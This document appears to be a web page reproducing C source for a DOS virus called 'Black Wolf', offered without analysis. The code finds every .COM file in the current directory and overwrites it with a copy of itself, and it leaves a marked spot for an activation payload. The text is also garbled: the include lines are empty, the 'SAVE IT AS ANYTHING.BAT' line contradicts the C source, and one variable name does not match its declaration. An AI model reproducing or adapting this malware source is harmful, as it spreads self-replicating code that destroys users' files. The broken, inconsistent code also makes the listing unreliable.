

BLACK WOLF VIRUS

```
/* It will infect all .COM files in the current directory */  
SAVE IT AS ANYTHING.BAT
```

```
#include
```

```
#include
```

```
#include
```

```
FILE *Virus,*Host;
```

```
int x,y,done;
```

```
char buff[256];
```

```
struct fblk fblk;
```

```
main()
```

```
{
```

```
done = findfirst("*.COM",&fblk,0); /* Find a .COM file */
```

```
while (!done) /* Loop for all COM's in DIR*/
```

```
{
```

```
printf("Infecting %s\n", fblk.ff_name); /* Inform user */
```

```
Virus=fopen(_argv[0],"rb"); /* Open infected file */
```

```
Host=fopen(fblk.ff_name,"rb+"); /* Open new host file */
```

```
x=9504; /* Virus size – must */
```

```
/* be correct for the */
```

```
/* compiler it is made */
```

```
/* on, otherwise the */
```

```
/* entire virus may not*/
```

```
/* be copied!! */
```

```
while (x>256) /* OVERWRITE new Host */
```

```
{ /* Read/Write 256 byte */

fread(buff,256,1,Virus); /* chunks until bytes */

fwrite(buff,256,1,Host); /* left < 256 */

x-=256;

}

fread(buff,x,1,Virus); /* Finish off copy */

fwrite(buff,x,1,Host);

fcloseall(); /* Close both files and*/

done = findnext(&ffblk); /* go for another one. */

}

/* Activation would go */

/* here */

return (0); /* Terminate */

}
```